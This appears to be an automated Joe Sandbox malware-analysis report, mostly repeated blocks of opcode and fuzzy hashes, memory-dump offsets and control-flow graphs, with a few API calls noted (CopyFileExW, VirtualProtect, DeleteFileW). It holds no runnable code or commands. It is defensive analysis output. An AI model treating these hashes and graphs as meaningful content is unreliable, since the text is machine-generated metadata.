                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ($<$ntin
                                                                                          • API String ID: 0-2777557274
                                                                                          • Opcode ID: 36096c04db626cd8ff4fda5c6d02d8246d4e37411e8d86466ec958a19983ec0b
                                                                                          • Instruction ID: 70a618661445d83e748abc9b39c35aeb19bcc6c7b181f71689e1b5d5ccd93aaa
                                                                                          • Opcode Fuzzy Hash: 36096c04db626cd8ff4fda5c6d02d8246d4e37411e8d86466ec958a19983ec0b
                                                                                          • Instruction Fuzzy Hash: AFA2C674E042198FDB19CF99C981ADDBBF2BF89304F2581A9D508AB355D730AD82CF61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 276 318240-318550 279 318552 276->279 280 318557-3185b9 276->280 279->280 391 3185bf call 318d20 280->391 392 3185bf call 318d10 280->392 283 3185c5-3185cb 393 3185d1 call 319b30 283->393 394 3185d1 call 319b40 283->394 284 3185d7-3185dd 395 3185e3 call 31a2e0 284->395 396 3185e3 call 31a2d0 284->396 285 3185e9-31860d 399 318613 call 31adf0 285->399 400 318613 call 31ae00 285->400 287 318619-318636 289 318646-318663 287->289 290 318638-318645 287->290 293 318673-318688 289->293 294 318665-318672 289->294 290->289 389 31868b call 31c270 293->389 390 31868b call 31c26a 293->390 294->293 297 318691-3186b8 299 3186ba-3186ed 297->299 300 3186ef-3186f1 297->300 301 3186f4-3186ff 299->301 300->301 303 318771-318787 301->303 304 318701-318770 301->304 307 3187b5-3187b7 303->307 308 318789-3187b3 303->308 304->303 309 3187ba-3187c5 307->309 308->309 311 3187c7-3187f9 309->311 312 3187fa-318817 309->312 311->312 318 318819 312->318 319 31881e-31884e 312->319 318->319 397 318851 call 31d3b8 319->397 398 318851 call 31d3a8 319->398 325 318857-3188ca 330 3188cc-3188dc 325->330 331 3188de-3188e0 325->331 332 3188e3-3188ee 330->332 331->332 333 3188f0-3188f6 332->333 334 318912-318935 332->334 386 3188fc call 31f085 333->386 387 3188fc call 31ef38 333->387 388 3188fc call 31f0ef 333->388 337 318937-31897c 334->337 338 31897d-318a00 334->338 335 318902-318911 335->334 337->338 346 318a10-318a2c 338->346 347 318a02-318a0f 338->347 349 318a3a-318a3c 346->349 350 318a2e-318a38 346->350 347->346 351 318a42-318a50 349->351 350->351 352 318b44-318b60 351->352 353 318a56-318b43 351->353 356 318b62-318b76 352->356 357 318b78-318b7a 352->357 353->352 359 318b80-318b8e 356->359 357->359 360 318c75-318c80 359->360 361 318b94-318c74 359->361 363 318c82-318c9b 360->363 364 318c9c-318cfa 360->364 361->360 363->364 386->335 387->335 388->335 389->297 390->297 391->283 392->283 393->284 394->284 395->285 396->285 397->325 398->325 399->287 400->287
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: fCk$fCk
                                                                                          • API String ID: 0-672950724
                                                                                          • Opcode ID: 675b7867e00c40b6ad68f5e1809371da2d3b5f413c54bd3c183a485673dc316a
                                                                                          • Instruction ID: caa75ef8f699b5a448576fabba92a82a6f8700b3820d72f9b039810a848c2003
                                                                                          • Opcode Fuzzy Hash: 675b7867e00c40b6ad68f5e1809371da2d3b5f413c54bd3c183a485673dc316a
                                                                                          • Instruction Fuzzy Hash: F332C174901228CFCB2ADF75D8587ADBBB2BF49305F1085EAD409A7394DB355A82CF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: <$@
                                                                                          • API String ID: 0-1426351568
                                                                                          • Opcode ID: 14428071a2858014ac1e4e6a821c15700aa2849711fe66e5b4d13fe651877cb0
                                                                                          • Instruction ID: d88e973c3f58d069e0eb4157749aec7818b5c42682945333e2551105c4bf2235
                                                                                          • Opcode Fuzzy Hash: 14428071a2858014ac1e4e6a821c15700aa2849711fe66e5b4d13fe651877cb0
                                                                                          • Instruction Fuzzy Hash: BE62B1B4900259CFDB24DFA9C981A9DFBF2BF48314F56C1A9D509AB211D730AE81CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9d4cfb405637efb6ae3f524115fe490e8d7900c6c2dc7c84a6a2a2372c70e01c
                                                                                          • Instruction ID: afbdf039209cf00e65b9564734d13dfb6a6328ceb4a1239ccfe72d11044215f8
                                                                                          • Opcode Fuzzy Hash: 9d4cfb405637efb6ae3f524115fe490e8d7900c6c2dc7c84a6a2a2372c70e01c
                                                                                          • Instruction Fuzzy Hash: 01428074E01219CFDB64CFA9C984B9DBBB2BF88310F5592A9D809A7355D730AE81CF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: facb8043ddf9c46c80d0717757e6e87c35acf89e7d443ff021f65ec44bde55bd
                                                                                          • Instruction ID: 0fa42009c859be464c8d82ebb4041539f5bd012ab8e35b5beeac3c78e23e452c
                                                                                          • Opcode Fuzzy Hash: facb8043ddf9c46c80d0717757e6e87c35acf89e7d443ff021f65ec44bde55bd
                                                                                          • Instruction Fuzzy Hash: 2E32E270900258CFDB54DFA9C581AADFBB2BF48315F56C1A9D509AB212CB30ED85CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8db1069c07cf8379a19bcdb6ae52136c47ee13c27bb1a4fcb9cd4fcebeba9f19
                                                                                          • Instruction ID: 57cc0f399b5691d3ef9aa43a5ff7cd744d81806db094a3cca0e9498a86702cba
                                                                                          • Opcode Fuzzy Hash: 8db1069c07cf8379a19bcdb6ae52136c47ee13c27bb1a4fcb9cd4fcebeba9f19
                                                                                          • Instruction Fuzzy Hash: 13D1D074E00218CFDB58EFA9D994BADBBB2BF88304F1081AAD509A7355DB305E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fbccd42c413eaba7c78a50c043ab29d6856111b5f6927d2e9593636ebfb216ef
                                                                                          • Instruction ID: bee41d0035cacec77a253e3c4628497fff197e843aaed3dcd603706746d56209
                                                                                          • Opcode Fuzzy Hash: fbccd42c413eaba7c78a50c043ab29d6856111b5f6927d2e9593636ebfb216ef
                                                                                          • Instruction Fuzzy Hash: 8AD19F74D01218CFDB18DFA5E988BEDBBB2BF49305F2081AAD809A7355DB345A85CF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 752ef88ebec404cd695ab4b2c1719a91ccfcbc776e7a94e5b2ec6bd74fee8c45
                                                                                          • Instruction ID: df2e7816da975f60219cd52a1c76b9e9fb6c11d463b812742ebd999d86be4d37
                                                                                          • Opcode Fuzzy Hash: 752ef88ebec404cd695ab4b2c1719a91ccfcbc776e7a94e5b2ec6bd74fee8c45
                                                                                          • Instruction Fuzzy Hash: 97D19E74D01218CFDB18DFB5E888BEDBBB2BF49305F2081AAD809A7255DB345A85CF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 43c2e1a47c7e3581e3b5b3f0bab5e827bda09075dd92d74809bd7e664b97c460
                                                                                          • Instruction ID: ffe2ac9cd6b4e54afdd0aed70dc271cc9982d7103874a8615dad39f4d4078dfe
                                                                                          • Opcode Fuzzy Hash: 43c2e1a47c7e3581e3b5b3f0bab5e827bda09075dd92d74809bd7e664b97c460
                                                                                          • Instruction Fuzzy Hash: D1B1D674E042188FDB14DFA9C850AEDFBB2BF89314F64C1AAD419AB355EB309985CF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 052054606c88859966942328322750ceff20e1eca3837959df5962da56c7c2d6
                                                                                          • Instruction ID: fb42ca80391785ec2ca09afeb2e4ed8b665d736e11ccabacf52e5a78ddefad6a
                                                                                          • Opcode Fuzzy Hash: 052054606c88859966942328322750ceff20e1eca3837959df5962da56c7c2d6
                                                                                          • Instruction Fuzzy Hash: DDA1D274D00218CFDB14EFA9D99879DFBB2FF88300F1084AAD449A7265DB345A99CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 057f132fe43d5bc99e8911f3dd25266f536951785ac63b22b9577b84294bfbd6
                                                                                          • Instruction ID: b458012c2a9d6c2f75e922d9cc4db31a93c831c1a5291ea6f97264bd42fb6967
                                                                                          • Opcode Fuzzy Hash: 057f132fe43d5bc99e8911f3dd25266f536951785ac63b22b9577b84294bfbd6
                                                                                          • Instruction Fuzzy Hash: 04512274D05218DFDB19CFA5C5887EDBBB2BF49305F24902AE405AB3A4C779898ACF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 05b6d7bdddc298319a7d09f8f4e2bdb726fe0702326e21f29b519e09363b95c7
                                                                                          • Instruction ID: 421631fbbd2aaceb419b2873ae0790760d892ead439d0989ddaf30c2b55409b6
                                                                                          • Opcode Fuzzy Hash: 05b6d7bdddc298319a7d09f8f4e2bdb726fe0702326e21f29b519e09363b95c7
                                                                                          • Instruction Fuzzy Hash: F2210571D042188FCB09DFB4D8187EEBBB1AF4A305F00956AD515B72A0CB785984CFA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 450f9665161f3d70fab695ae545a79aba078a16ebdb267f4dcad9c6d5d2e1506
                                                                                          • Instruction ID: 9755367ad9d3fff19972c6cfdc9e853e3463b4f754e0db4059b6eb7672bcc96f
                                                                                          • Opcode Fuzzy Hash: 450f9665161f3d70fab695ae545a79aba078a16ebdb267f4dcad9c6d5d2e1506
                                                                                          • Instruction Fuzzy Hash: 5E012870D152089FCB05DFB4D8047AEBFF0BF0A301F1045AAC418A7291DB344A54CF95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 576 318234-31e60f 579 31e6b2-31e6d5 576->579 580 31e615-31e64d 576->580 581 31e778-31e78a 579->581 582 31e6db-31e713 579->582 594 31e67f-31e68d 580->594 595 31e64f-31e654 580->595 583 31e797-31e80c CopyFileExW 581->583 584 31e78c-31e794 581->584 596 31e745-31e753 582->596 597 31e715-31e71a 582->597 586 31e815-31e847 583->586 587 31e80e-31e814 583->587 584->583 598 31e849-31e858 586->598 599 31e85e-31e875 586->599 587->586 602 31e690-31e6aa 594->602 600 31e677-31e67d 595->600 601 31e656-31e660 595->601 613 31e756-31e770 596->613 604 31e73d-31e743 597->604 605 31e71c-31e726 597->605 598->599 615 31e877-31e886 599->615 616 31e88c-31e8d8 599->616 600->602 606 31e662 601->606 607 31e664-31e673 601->607 602->579 604->613 610 31e728 605->610 611 31e72a-31e739 605->611 606->607 607->607 614 31e675 607->614 610->611 611->611 617 31e73b 611->617 613->581 614->600 615->616 622 31e8e8-31e8ec 616->622 623 31e8da-31e8de 616->623 617->604 625 31e8fc 622->625 626 31e8ee-31e8f2 622->626 623->622 624 31e8e0 623->624 624->622 628 31e8fd 625->628 626->625 627 31e8f4 626->627 627->625 628->628
                                                                                          APIs
                                                                                          • CopyFileExW.KERNEL32(?,?,?,?,?,?), ref: 0031E7F9
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyFile
                                                                                          • String ID:
                                                                                          • API String ID: 1304948518-0
                                                                                          • Opcode ID: 637db23d739a9e0d0ca567cf2faf1ba9195ad15fe021a6e3aad83be22682f692
                                                                                          • Instruction ID: b2af4781184c473d03038524302533b436d88ece3d15371c262995cbf32678e2
                                                                                          • Opcode Fuzzy Hash: 637db23d739a9e0d0ca567cf2faf1ba9195ad15fe021a6e3aad83be22682f692
                                                                                          • Instruction Fuzzy Hash: 16C1DF74E002188FDB25CFA9C981BDEBBB1BF49304F1481A9E819B7351DB35AA85CF45
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 629 318232-31e60f 632 31e6b2-31e6d5 629->632 633 31e615-31e64d 629->633 634 31e778-31e78a 632->634 635 31e6db-31e713 632->635 647 31e67f-31e68d 633->647 648 31e64f-31e654 633->648 636 31e797-31e80c CopyFileExW 634->636 637 31e78c-31e794 634->637 649 31e745-31e753 635->649 650 31e715-31e71a 635->650 639 31e815-31e847 636->639 640 31e80e-31e814 636->640 637->636 651 31e849-31e858 639->651 652 31e85e-31e875 639->652 640->639 655 31e690-31e6aa 647->655 653 31e677-31e67d 648->653 654 31e656-31e660 648->654 666 31e756-31e770 649->666 657 31e73d-31e743 650->657 658 31e71c-31e726 650->658 651->652 668 31e877-31e886 652->668 669 31e88c-31e8d8 652->669 653->655 659 31e662 654->659 660 31e664-31e673 654->660 655->632 657->666 663 31e728 658->663 664 31e72a-31e739 658->664 659->660 660->660 667 31e675 660->667 663->664 664->664 670 31e73b 664->670 666->634 667->653 668->669 675 31e8e8-31e8ec 669->675 676 31e8da-31e8de 669->676 670->657 678 31e8fc 675->678 679 31e8ee-31e8f2 675->679 676->675 677 31e8e0 676->677 677->675 681 31e8fd 678->681 679->678 680 31e8f4 679->680 680->678 681->681
                                                                                          APIs
                                                                                          • CopyFileExW.KERNEL32(?,?,?,?,?,?), ref: 0031E7F9
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyFile
                                                                                          • String ID:
                                                                                          • API String ID: 1304948518-0
                                                                                          • Opcode ID: 06c778f4c25bafe6966b238744f72c28f9c3a855082d8ef8a7f3810ee619b900
                                                                                          • Instruction ID: c614bd1cd06244cd935a056211f4cffbf48d1fa7393c587e634b203fe9fbadb3
                                                                                          • Opcode Fuzzy Hash: 06c778f4c25bafe6966b238744f72c28f9c3a855082d8ef8a7f3810ee619b900
                                                                                          • Instruction Fuzzy Hash: 8EB1EF74E002188FDB25CFA9C885BDEBBB1BF49304F1481A9E819B7251DB35AA85CF45
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 682 313ac1-313b7f VirtualProtect 684 313b81-313b87 682->684 685 313b88-313bc4 682->685 684->685
                                                                                          APIs
                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 00313B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: a895a9a0e58f253a6c90e5119c0d4325bb6ef29820a9cd902d4cfbe3ad9d7551
                                                                                          • Instruction ID: ccf25b0864b6af325e1f75f3d4094717edbcab2a39ce41c3592d4a1019aba595
                                                                                          • Opcode Fuzzy Hash: a895a9a0e58f253a6c90e5119c0d4325bb6ef29820a9cd902d4cfbe3ad9d7551
                                                                                          • Instruction Fuzzy Hash: D33188B8D042589FCB10CFA9D484AEEFBB0FB5A310F24946AE854B7210D775AA45CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 688 3177b8-317877 VirtualProtect 690 317880-3178bc 688->690 691 317879-31787f 688->691 691->690
                                                                                          APIs
                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 00317867
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: d4eff3c72050b28aaecf20b9a83d03b317e547d6c848122fec8b27bf302931d1
                                                                                          • Instruction ID: 5651bb34829da4179348b724352548dac7132e1f39dafb73dcad58b93e15e89f
                                                                                          • Opcode Fuzzy Hash: d4eff3c72050b28aaecf20b9a83d03b317e547d6c848122fec8b27bf302931d1
                                                                                          • Instruction Fuzzy Hash: FF3178B9D042589FCB14CFA9E484ADEFBB0BB4A310F24942AE854B7310D375AA45CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 694 313ac8-313b7f VirtualProtect 696 313b81-313b87 694->696 697 313b88-313bc4 694->697 696->697
                                                                                          APIs
                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 00313B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 145d8306dd953722904187950f0d315e5b042540373a59ccb7b3054fe0672b8d
                                                                                          • Instruction ID: 50ab0e2345476182cc738b75303b5b32bc9a55e661d89699d99267bb2e70417e
                                                                                          • Opcode Fuzzy Hash: 145d8306dd953722904187950f0d315e5b042540373a59ccb7b3054fe0672b8d
                                                                                          • Instruction Fuzzy Hash: 263198B8D042589FCB10CFA9D484AEEFBB0BB19310F24902AE814B7310D775AA45CFA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 700 3177c0-317877 VirtualProtect 702 317880-3178bc 700->702 703 317879-31787f 700->703 703->702
                                                                                          APIs
                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 00317867
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: ae89f1441132e8bbd2c3204bb7f901568a55850d2d29708f39be7cca5e919332
                                                                                          • Instruction ID: 15473cfac61ab43a1a9c4826c466e6f530f89bde44fa0f6f6bfd29d959554bb2
                                                                                          • Opcode Fuzzy Hash: ae89f1441132e8bbd2c3204bb7f901568a55850d2d29708f39be7cca5e919332
                                                                                          • Instruction Fuzzy Hash: 013177B9D042589FCF14CFA9E484ADEFBB4BB4A310F24942AE814B7310D775AA45CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 706 312f5c-317ed9 709 317edb-317eea 706->709 710 317eed-317f29 DeleteFileW 706->710 709->710 711 317f32-317f74 710->711 712 317f2b-317f31 710->712 712->711
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: 43abe19f0c9e95d7ad100dc099eebd1e20686763c7fca58d54e298161420dfd8
                                                                                          • Instruction ID: 54eeac7e2003f7388d4e41344b269e7ca07bc4af9a0847d96f535509e0837698
                                                                                          • Opcode Fuzzy Hash: 43abe19f0c9e95d7ad100dc099eebd1e20686763c7fca58d54e298161420dfd8
                                                                                          • Instruction Fuzzy Hash: 0A31ACB4D052189FCB14CFA9D884AEEFBF5AB49314F14846AE414B7210D375A985CBA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 716 317e7a-317ed9 718 317edb-317eea 716->718 719 317eed-317f29 DeleteFileW 716->719 718->719 720 317f32-317f74 719->720 721 317f2b-317f31 719->721 721->720
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177169764.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_310000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: c65cbcc60c7b07c799d014573278025261199f760a20be1c3144389fff6a081e
                                                                                          • Instruction ID: 940b71ce27ec87cb35bf1e1d7d1477cb8cfbf6d67237f3b125935b67aad5a882
                                                                                          • Opcode Fuzzy Hash: c65cbcc60c7b07c799d014573278025261199f760a20be1c3144389fff6a081e
                                                                                          • Instruction Fuzzy Hash: 5D31AAB4D092589FCB10CFA9D884AEEFBF0BF49314F18846AE814B7250D375AA85CB54
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177049986.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_16d000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a5470d463f0f561f3a5455cbc6a814aa66f2682916b666f3507c488d23601545
                                                                                          • Instruction ID: eb0c75ebefd725e6e9826dbbf24cff4283d559395880bee37980928f4222ed29
                                                                                          • Opcode Fuzzy Hash: a5470d463f0f561f3a5455cbc6a814aa66f2682916b666f3507c488d23601545
                                                                                          • Instruction Fuzzy Hash: 2C214871A04244DFCB14DF10EDC0B26BF65FB98314F24C168E9094B60AC736EC26C7A2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177049986.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_16d000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac3270d4498a49e86bf1f1d1523f66e78a1f074cd178e05ec1148e5327153b49
                                                                                          • Instruction ID: 31bb9dd4ffb546751f9da5f22c6f49c956f8280d9acb8d4727826d5db2bd2dc6
                                                                                          • Opcode Fuzzy Hash: ac3270d4498a49e86bf1f1d1523f66e78a1f074cd178e05ec1148e5327153b49
                                                                                          • Instruction Fuzzy Hash: 1D210371A04244DFCB15DF14ECC0B26BF75FB88318F24C569E9064BA06C336D826CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177049986.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_16d000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3630e81130c5ad3ccc8a6c51d744565a6a9584d7478e96c596689db372f3e6c5
                                                                                          • Instruction ID: 009b0fb0ab1888d8fc55b39087bd6eef930630dc78016aec94b237bb5fea7d5d
                                                                                          • Opcode Fuzzy Hash: 3630e81130c5ad3ccc8a6c51d744565a6a9584d7478e96c596689db372f3e6c5
                                                                                          • Instruction Fuzzy Hash: 7511D675904240DFCB11CF10D9C4B16BF71FB94314F24C6A9D8094B656C33AD866CB92
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2177049986.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_16d000_12.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3630e81130c5ad3ccc8a6c51d744565a6a9584d7478e96c596689db372f3e6c5
                                                                                          • Instruction ID: 523783e173c34c279f8cb3bd325138bd596215a5d263742f8fa730c1b0fdfdb0
                                                                                          • Opcode Fuzzy Hash: 3630e81130c5ad3ccc8a6c51d744565a6a9584d7478e96c596689db372f3e6c5
